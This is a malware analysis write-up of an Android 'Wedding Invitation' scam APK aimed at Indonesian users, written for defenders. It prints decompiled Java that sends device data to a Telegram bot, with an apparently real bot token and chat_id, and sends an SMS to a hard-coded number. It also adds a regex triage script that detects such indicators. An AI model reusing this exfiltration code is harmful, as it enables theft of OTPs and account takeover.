Analyzing scam in Indonesia named "Wedding Invitation"
Affected Platforms: Android
Impacted Users: Indonesian citizens
Impact: Stolen credentials such as OTPs, email addresses, usernames, and passwords can lead to account takeover
Infection Vector
Analyzing APK Statically
Decompile the APK using jadx-gui.
To speed up the static analysis process, I saved all the source code and opened it in a text editor. Looking at the MainActivity.java file in the directory com/example/myapplicatior, we can see the main class of the APK.
Checking the onCreate function, we can see the lines of code that are executed first:
- Creates a WebView instance, then loads the URL defined by HttpUrl.FRAGMENT_ENCODE_SET
- Checks the SDK version
- Requests SMS permissions (SEND and RECEIVE)
So at the end of the onCreate function it requests permissions. After the user interacts with the permission prompt, the result is passed to the onRequestPermissionsResult function.
onRequestPermissionsResult function
    public void onRequestPermissionsResult(int i, String[] strArr, int[] iArr) {
        super.onRequestPermissionsResult(i, strArr, iArr);
        if (i == 1000) { // request code of the SMS permission request made in onCreate
            if (iArr[0] != 0) { // PERMISSION_GRANTED is 0, so this branch handles a denied request
                Toast.makeText(this, "Permission Not Granted!", 0).show();
                // Even when denied, the install and device type are reported to the operator's Telegram chat
                this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot6755241478:AAE_77p9ygAzNP5VdIFRLTQ2lkaOJCtzSOk/sendMessage?parse_mode=markdown&chat_id=6562987404&text=𝐍𝐨𝐭𝐢𝐟𝐢𝐤𝐚𝐬𝐢 𝐀𝐩𝐥𝐢𝐤𝐚𝐬𝐢 𝐃𝐢 𝐈𝐧𝐬𝐭𝐚𝐥𝐥 \n 𝐓𝐲𝐩𝐞 𝐏𝐞𝐫𝐚𝐧𝐠𝐤𝐚𝐭: _" + this.device + "_").build()).enqueue(new Callback() { // from class: com.example.myapplicatior.MainActivity.4
                    @Override // okhttp3.Callback
                    public void onFailure(Call call, IOException iOException) {
                        iOException.printStackTrace();
                    }

                    @Override // okhttp3.Callback
                    public void onResponse(Call call, Response response) throws IOException {
                        Log.d("demo1", "OnResponse: Thread Id " + Thread.currentThread().getId());
                        if (response.isSuccessful()) {
                            response.body().string();
                        }
                    }
                });
                finish();
                return;
            }
            // Permission granted: report the install and device type to the same Telegram chat
            this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot6755241478:AAE_77p9ygAzNP5VdIFRLTQ2lkaOJCtzSOk/sendMessage?parse_mode=markdown&chat_id=6562987404&text=𝐍𝐨𝐭𝐢𝐟𝐢𝐤𝐚𝐬𝐢 𝐀𝐩𝐥𝐢𝐤𝐚𝐬𝐢 𝐃𝐢 𝐈𝐧𝐬𝐭𝐚𝐥𝐥 \n 𝐓𝐲𝐩𝐞 𝐏𝐞𝐫𝐚𝐧𝐠𝐤𝐚𝐭: _" + this.device).build()).enqueue(new Callback() { // from class: com.example.myapplicatior.MainActivity.2
                @Override // okhttp3.Callback
                public void onFailure(Call call, IOException iOException) {
                    iOException.printStackTrace();
                }

                @Override // okhttp3.Callback
                public void onResponse(Call call, Response response) throws IOException {
                    Log.d("demo1", "OnResponse: Thread Id " + Thread.currentThread().getId());
                    if (response.isSuccessful()) {
                        response.body().string();
                    }
                }
            });
            try {
                // Sends an SMS containing "P" to a hard-coded number
                SmsManager.getDefault().sendTextMessage("082178518060", null, "P", null, null);
            } catch (Exception e) {
                // Any failure is also reported to the Telegram chat
                this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot6755241478:AAE_77p9ygAzNP5VdIFRLTQ2lkaOJCtzSOk/sendMessage?parse_mode=markdown&chat_id=6562987404&text=Error : _" + e).build()).enqueue(new Callback() { // from class: com.example.myapplicatior.MainActivity.3
                    @Override // okhttp3.Callback
                    public void onFailure(Call call, IOException iOException) {
                        iOException.printStackTrace();
                    }

                    @Override // okhttp3.Callback
                    public void onResponse(Call call, Response response) throws IOException {
                        Log.d("demo1", "OnResponse: Thread Id " + Thread.currentThread().getId());
                        if (response.isSuccessful()) {
                            response.body().string();
                        }
                    }
                });
                Toast.makeText(getApplicationContext(), HttpUrl.FRAGMENT_ENCODE_SET + e, 1).show();
            }
            // Checks notification policy access but opens the notification listener settings screen;
            // "MEMBUKA UNDANGAN" means "OPENING INVITATION"
            NotificationManager notificationManager = (NotificationManager) getApplicationContext().getSystemService("notification");
            if (Build.VERSION.SDK_INT >= 23 && !notificationManager.isNotificationPolicyAccessGranted()) {
                startActivity(new Intent("android.settings.ACTION_NOTIFICATION_LISTENER_SETTINGS"));
                Toast.makeText(this, "MEMBUKA UNDANGAN", 0).show();
            }
            // Registers the receiver that handles local "Msg" broadcasts
            LocalBroadcastManager.getInstance(this).registerReceiver(this.onNotice, new IntentFilter("Msg"));
        }
    }
Basically it performs two different behaviors depending on the user's choice; the details are below.
If the user agrees:
- Sends a "success" message through the Telegram API containing the following information:
  - Device information
- Sends a message through SMS:
  - The message "P", which is the same as "ping" in Indonesian
- Creates an intent and filter for SMS notifications
- Creates a Toast
If the user does not agree:
- Sends a "failed" message through the Telegram API containing the following information:
  - Device information
The code of the created intent filter can be seen in the code below; it:
- Sends the stored data to the threat actor's Telegram as formatted text
From this behavior we can see that the APK is "malicious", since it silently forwards SMS messages to an unauthorized party, the threat actor. Because the application is not obfuscated and all of its code is straightforward, we do not need dynamic analysis to reveal the malicious behavior.
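The indicators above (Telegram bot API exfiltration URLs, a hard-coded SMS recipient, SMS permissions and the notification-listener settings intent) can be pulled out of jadx output automatically. The following triage script is an added example, not part of the original analysis; its sample source, bot token, chat_id and phone number are constructed placeholders rather than the values from the analysed APK.

```python
import re

# Constructed sample shaped like the jadx output above; the bot token, chat_id and
# phone number are placeholders, not the values from the analysed APK.
SAMPLE_SOURCE = '''
this.client.newCall(new Request.Builder().url("https://api.telegram.org/bot1234567890:AAexample_placeholder_token/sendMessage?parse_mode=markdown&chat_id=1111111111&text=Notif").build());
SmsManager.getDefault().sendTextMessage("08XXXXXXXXXX", null, "P", null, null);
startActivity(new Intent("android.settings.ACTION_NOTIFICATION_LISTENER_SETTINGS"));
LocalBroadcastManager.getInstance(this).registerReceiver(this.onNotice, new IntentFilter("Msg"));
requestPermissions(new String[]{"android.permission.RECEIVE_SMS", "android.permission.SEND_SMS"}, 1000);
'''

# Patterns for the indicators discussed in the analysis.
TELEGRAM_RE = re.compile(
    r'https://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(\w+)[^"]*?chat_id=(\d+)')
SMS_SEND_RE = re.compile(r'SmsManager\.getDefault\(\)\.sendTextMessage\("([^"]*)"')
SMS_PERM_RE = re.compile(r'android\.permission\.(SEND_SMS|RECEIVE_SMS|READ_SMS)')
NOTIF_LISTENER_RE = re.compile(r'ACTION_NOTIFICATION_LISTENER_SETTINGS')


def triage(source):
    """Return the structured indicators found in a decompiled-source string."""
    return {
        "telegram": TELEGRAM_RE.findall(source),        # (bot token, API method, chat_id)
        "sms_targets": SMS_SEND_RE.findall(source),     # hard-coded SMS recipients
        "sms_permissions": sorted(set(SMS_PERM_RE.findall(source))),
        "notification_listener": bool(NOTIF_LISTENER_RE.search(source)),
    }


def classify(findings):
    """SMS access combined with an out-of-app exfiltration channel is the stealer pattern."""
    reads_sms = bool(findings["sms_permissions"]) or findings["notification_listener"]
    exfil = bool(findings["telegram"])
    if reads_sms and exfil:
        return "likely SMS/OTP stealer"
    if exfil or findings["sms_targets"]:
        return "suspicious: review manually"
    return "no indicators"


if __name__ == "__main__":
    found = triage(SAMPLE_SOURCE)
    for key, value in found.items():
        print(f"{key}: {value}")
    print("verdict:", classify(found))
```

Run it against a directory of jadx output by reading each .java file into `triage`; the bot token and chat_id it extracts are the values to block or report.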
Conclusion
From the URL used, we know that the threat actor uses Telegram to receive the "leaked" data. The threat actor also sends a message through SMS to get a notification on their own phone. This malware would be very harmful in other scenarios such as a password reset, account registration, or account login, because the threat actor would receive sensitive information such as OTPs, usernames, or even passwords through their Telegram account. However, we should know that this APK is not harmful if we do not grant it any permissions, even though we have installed it.